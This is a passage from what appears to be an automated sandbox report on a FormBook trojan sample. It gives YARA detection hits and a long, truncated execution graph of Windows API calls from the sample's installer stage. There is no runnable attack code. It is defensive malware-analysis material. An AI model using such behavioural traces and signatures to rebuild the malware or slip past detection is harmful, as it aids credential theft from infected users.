                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            Reputation:high

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:15.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:16.4%
                                                                                              Total number of Nodes:1385
                                                                                              Total number of Limit Nodes:25
                                                                                              execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 